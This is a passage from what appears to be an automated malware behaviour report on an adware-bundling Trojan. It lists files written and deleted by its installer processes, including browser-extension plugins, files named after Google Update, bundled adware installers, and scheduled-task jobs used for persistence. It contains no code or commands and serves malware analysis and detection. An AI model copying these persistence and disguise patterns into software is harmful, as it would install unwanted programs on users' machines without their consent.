%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\update.json (39 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\1.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\38.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\36.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\64.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\40.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\78.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\104.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\21.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\72.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\userCode\background.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\223.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\217.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\InstallerUtils2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\114943 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\7.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\2.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp (0 bytes)
%WinDir%\Tasks\temp_34d16228-9e90-4879-9804-8e38b5180d78-2.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\42.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\47.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\207.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\102.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\244.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\43.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\InstallerUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\182.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\4.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\246.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\13.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\14.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\46.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\94.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\44.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\userCode (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\41.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\45.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\112967 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\35.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\183.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\37.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\184.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\39.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\177.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\226.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\manifest.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\3.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\220.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\204.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\17.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\userCode\extension.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\91.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\ExecDos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\195.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\93.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\update.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\9.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\28.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\22.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\155.js (0 bytes)

The process Sense-codedownloader.exe:216 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\intext_5_j_m[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\plugins[2].json (4585 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\setup[1].js (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\monetizationLoader[2].js (72929 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\superfish_no_coupons_m[1].js (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\dealply_m[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ciuvo_m[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\app_code[1].js (616 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\dealply_m[1].js (0 bytes)

The process Udugcvjfj.exe:3492 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\System.dll (11 bytes)
%Program Files%\Sense\48292.xpi (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\47.js (7 bytes)
%Program Files%\Sense\48292.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\InstallerUtils.dll (25824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\7.js (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\14.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\39.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\123.js (889 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\182.js (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\1.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.12695\GoogleUpdateBroker.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\177.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\44.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\4.js (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.12695\goopdateres_en.dll (26 bytes)
%Program Files%\Sense\Sense-bho.dll (3361 bytes)
%WinDir%\Tasks\temp_ca91e4a6-ab07-4dc2-9156-7c7e5962e962-2.job (138 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\43.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\update[2].json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\28.js (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\246.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\93.js (793 bytes)
%Program Files%\Sense\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\41.js (2 bytes)
%Program Files%\Sense\1293297481.mxaddon (1552 bytes)
%WinDir%\Tasks\ca91e4a6-ab07-4dc2-9156-7c7e5962e962-5.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\496520 (283214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\183.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\223.js (453 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\192.js (797 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.12695\GoogleUpdateHelper.msi (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\233.js (797 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\230233 (1072587 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi28.tmp (384226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\78.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\46.js (2 bytes)
%Program Files%\Sense\Sense-codedownloader.exe (3073 bytes)
%Program Files%\Sense\ca91e4a6-ab07-4dc2-9156-7c7e5962e962-5.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\180.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\update.json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\195.js (378 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.12695\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\94.js (1 bytes)
%Program Files%\Sense\Sense-bg.exe (4185 bytes)
%Program Files%\Sense\ca91e4a6-ab07-4dc2-9156-7c7e5962e962-3.exe (13122 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.12695\psuser.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\211.js (797 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\102.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\40.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins.json (16 bytes)
%Program Files%\Sense\360-48292.crx (1425 bytes)
%WinDir%\Tasks\ca91e4a6-ab07-4dc2-9156-7c7e5962e962-1.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\38.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\42.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\13.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\207.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\239.js (797 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\226.js (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\230.js (797 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.12695\GoogleCrashHandler.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\userCode\extension.js (613 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.12695\goopdate.dll (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\md5dll.dll (6 bytes)
%Program Files%\Sense\ca91e4a6-ab07-4dc2-9156-7c7e5962e962-4.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\104.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\91.js (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.12695\psmachine.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\17.js (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\37.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\72.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\21.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\45.js (1 bytes)
%Program Files%\Sense\utils.exe (67653 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\193.js (797 bytes)
%Program Files%\Sense\background.html (729 bytes)
%WinDir%\Tasks\ca91e4a6-ab07-4dc2-9156-7c7e5962e962-3.job (74 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.12695\npGoogleUpdate4.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\155.js (449 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\184.js (1 bytes)
%Program Files%\Sense\Sense.ico (15 bytes)
%Program Files%\Sense\Sense-buttonutil.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\64.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\22.js (8 bytes)
%Program Files%\Sense\ca91e4a6-ab07-4dc2-9156-7c7e5962e962-2.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\244.js (501 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\9.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\220.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.12695\GoogleUpdateOnDemand.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\103.js (2 bytes)
%WinDir%\Tasks\ca91e4a6-ab07-4dc2-9156-7c7e5962e962-2.job (70 bytes)
%Program Files%\Sense\Sense-buttonutil.exe (1425 bytes)
%WinDir%\Tasks\ca91e4a6-ab07-4dc2-9156-7c7e5962e962-4.job (72 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\496520 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\update.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\17.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\37.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\47.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\230.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\userCode (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\21.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\183.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\41.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn27.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\223.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\3.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\InstallerUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\7.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\192.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\233.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\28.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\193.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\14.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\102.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\userCode\background.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\40.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\39.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\123.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\182.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\230233 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\manifest.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\1.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\64.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\184.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\42.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\94.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\13.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\78.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\46.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\38.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\36.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\177.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\207.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\22.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\239.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\180.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\45.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\93.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\226.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\246.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\2.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\195.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\244.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\44.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\155.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\242.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\9.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\userCode\extension.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\4.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\220.js (0 bytes)
%WinDir%\Tasks\temp_ca91e4a6-ab07-4dc2-9156-7c7e5962e962-2.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\211.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\103.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\72.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\35.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\104.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\ExecDos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\91.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\InstallerUtils2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\43.js (0 bytes)

The process setup.exe:264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Install_16580\cr.exe (75854 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_16580\sense.exe (112865 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_16580\iwebar.exe (75524 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_16580\yta.exe (64704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_16580\sm.exe (65527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_16580\shopperpro.exe (27635 bytes)

The process testlsp.exe:2720 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\testlsp_2720.log (1339 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\helper_2720_testlsp.log (144 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\ipc_2720_testlsp.log (1905 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\engine_2720_testlsp.log (3425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\SMALLTEST[1].HTM (167 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\SMALLTEST[1].htm (70 bytes)

The process object browser-bg.exe:2252 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\rules[1].json (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ipgeoapi[2] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\CAAVY7YL.gif (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\0[1].htm (49 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ipgeoapi[1] (0 bytes)

The process schtasks.exe:2784 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\YTAUpdate.job (264 bytes)

The process schtasks.exe:2976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\YTAUpdate_logon.job (264 bytes)

The process sm.exe:2844 makes changes in the file system.
